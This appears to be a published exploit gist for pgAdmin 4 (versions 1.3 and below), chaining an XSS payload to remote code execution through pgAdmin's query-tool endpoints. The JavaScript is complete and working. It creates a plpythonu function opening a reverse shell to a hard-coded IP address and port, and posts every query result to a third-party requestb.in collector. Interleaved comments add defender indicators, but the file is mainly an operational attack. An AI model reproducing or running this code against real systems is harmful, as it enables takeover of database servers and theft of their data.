@evilpacket
Created April 16, 2017 17:43
pgAdmin 4 (1.3 and below) RCE via XSS
// select '<img src="x" onerror=$.getScript("http://127.0.0.1:8000/cmd_exec.js") />';
// multi-query payload for RCE
// The SQL statements doQuery() below sends, in order. exec() ships each one as
// the body `"<query>"` with Content-Type application/json, so the newlines and
// quotes in these literals are double-escaped: the JS string holds `\n` / `\"`
// and the JSON layer turns them into real newlines and quotes on the server.
//   1. create the plpythonu procedural language (an "untrusted" language, so
//      this step presumably only succeeds when the pgAdmin session's database
//      role is a superuser — not verifiable from this file);
//   2. define pwn(): its Python body opens a TCP socket to 162.242.167.28:4445,
//      dup2()s it over fds 0/1/2 and spawns /bin/sh -i, i.e. a reverse shell
//      running inside the PostgreSQL server process;
//   3. call pwn() to trigger it.
// Defender notes: the address/port above and the `create language plpythonu` /
// `LANGUAGE plpythonu` text are the indicators to search for in PostgreSQL
// statement logs and egress flow records. The array is consumed in place by
// doQuery() (shift()), so it is empty once the run completes.
var queries = ['create language plpythonu','CREATE OR REPLACE FUNCTION pwn() RETURNS text\\nLANGUAGE plpythonu\\nAS $$\\nimport socket,subprocess,os\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\\"162.242.167.28\\",4445))\\nos.dup2(s.fileno(),0)\\nos.dup2(s.fileno(),1)\\nos.dup2(s.fileno(),2)\\na=subprocess.Popen([\\"/bin/sh\\",\\"-i\\"])\\nreturn \\"\\"\\n$$;\\n', 'select pwn()']
// Harmless substitute left over from testing the request chain end to end.
//queries = ['select current_user']
// Third-party collector that receives every query's result set (see exfil()).
var exfil_url = 'http://requestb.in/16wy0z61'
// Send a result set off-origin: POST {data: JSON.stringify(data)} to exfil_url
// (jQuery encodes an object body as a form post by default). The success
// callback is empty and there is no .fail() handler, so nothing on the page
// reports whether the upload happened. For defenders this is an outbound XHR
// from the pgAdmin origin to an unrelated host; a Content-Security-Policy
// restricting connect-src on the pgAdmin pages would block it.
var exfil = function (data) {
// Leftover debugging hook.
//alert('exfiltrating....');
$.post(exfil_url, {data: JSON.stringify(data)}, function () {
});
}
// Run one SQL string through pgAdmin's own query-tool HTTP endpoints against
// every database node returned for server 1, then hand a result to cb.
//   query: SQL text, already escaped for embedding inside a JSON string — the
//          request below only wraps it in double quotes, it does not escape it.
//   cb:    called exactly once, after the last node has been tried, with
//          `results`. `results` is overwritten on every successful poll and
//          every failure simply moves on, so cb receives the result set of the
//          last database whose poll succeeded, or undefined if none did.
// Every request is a same-origin jQuery XHR that carries only the browser's
// pgAdmin session cookies — no CSRF token is attached anywhere in this chain,
// which is presumably why script running in the pgAdmin origin (via the
// <img onerror> payload in the comment at the top of this file) is enough to
// drive the query tool as the logged-in user. The fixed four-request pattern
// per database — GET /browser/database/nodes/…, POST
// /datagrid/initialize/query_tool/…, POST /sqleditor/query_tool/start/…,
// GET /sqleditor/poll/… — issued back to back from one session is the
// sequence to alert on in pgAdmin access logs.
// Note: each nested callback reuses the parameter name `response`, shadowing
// the outer one; the initial $.get has no .fail() handler, so if the node
// listing itself fails cb is never invoked.
var exec = function (query, cb) {
// Shared across the recursion below; holds the most recent poll result.
var results;
// DB List
// Step 1: list the database nodes. The hard-coded 1/1 path segments presumably
// select the first server group / server — confirm against pgAdmin's routes.
$.get('/browser/database/nodes/1/1/', function (response) {
// Unused: d is computed but never read.
var d = JSON.stringify(response.data);
// Process arr recursively, one database per call. arr is consumed in place
// via shift(), so the caller's array (response.data) is emptied.
var doStuff = function (arr) {
if (arr.length == 0) {
//alert('do stuff1 called');
return cb(results);
}
var id = arr.shift()._id;
// Query Tool Init
// Step 2: open a query-tool transaction for this database; pgAdmin returns
// its handle as gridTransId, which the next two requests are keyed on.
$.post('/datagrid/initialize/query_tool/1/' + id, function (response) {
var gridTransId = response.data.gridTransId;
// Make Query
// Step 3: submit the statement. The body is the raw query text wrapped in
// double quotes and sent as application/json; no escaping is applied here.
$.ajax('/sqleditor/query_tool/start/' + gridTransId, {
type: 'post',
data: '"' + query + '"',
dataType: 'json',
contentType: 'application/json',
success: function(response) {
// Get Results
// Step 4: a single poll for the result, issued after a 0 ms timeout (one
// event-loop turn); the poll is not repeated.
setTimeout(function () {
$.get('/sqleditor/poll/' + gridTransId, function (response) {
//exfil(response.data.result);
// Overwrites any earlier database's result.
results = response.data.result;
//alert('do stuff2 called');
return doStuff(arr);
}).fail(function (err) {
//alert(JSON.stringify(arguments))
//alert('do stuff3 called');
// Poll failed: move on to the next database.
return doStuff(arr);
})
}, 0);
}
}).fail(function () {
//alert('do stuff4 called');
// Query submission failed: move on to the next database.
return doStuff(arr);
})
}).fail(function () {
//alert('do stuff4 called');
// Query-tool init failed: move on to the next database.
return doStuff(arr);
})
}
// response.data is treated as an array of nodes (length/shift/_id) — assumed
// from usage, not verified here.
doStuff(response.data);
});
}
// Drain the queries array sequentially: exec() the head, exfil() its result,
// then recurse on the remainder. The array is consumed in place via shift().
// Nothing here inspects errors: exec() always calls back once its node
// listing succeeded, regardless of per-database failures, so a statement
// that failed on every database still leads to the next one being sent.
//   queries: array of SQL strings, already escaped for exec()'s JSON body.
var doQuery = function (queries) {
// Base case: nothing left to send.
if (queries.length == 0) {
//alert('ALL DONE');
return; // all done
}
var q = queries.shift();
exec(q, function (result) {
// Writes the full SQL text to the browser console — visible in DevTools of
// the affected pgAdmin session, which is useful when reconstructing an incident.
console.log('Done with ' + q);
exfil(result);
return doQuery(queries);
});
}
// Entry point: runs as soon as the script is evaluated, i.e. immediately after
// it is fetched by the $.getScript() call shown in the comment at the top.
doQuery(queries);